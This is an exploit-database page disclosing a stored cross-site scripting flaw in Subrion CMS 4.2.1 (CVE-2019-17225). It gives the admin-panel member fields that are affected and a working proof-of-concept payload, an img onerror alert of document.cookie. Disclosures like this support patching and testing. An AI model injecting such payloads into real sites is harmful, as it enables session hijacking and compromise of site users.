[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Subrion 4.2.1 - (Email) Persistant Cross-Site Scripting Vulnerability

Author
Creatigon
Risk
[
Security Risk High
]
0day-ID
0day-ID-33333
Category
web applications
Date add
07-10-2019
CVE
CVE-2019-17225
Platform
php
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description :  Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.

First login the panel with user credential, Go to member tag from left menu.

http://localhost/panel/members/

Username, Full Name, Email are editable with double click on it. Insert the
following payload

<img src=x onerror=alert(document.cookie)>

#  0day.today [2024-12-25]  #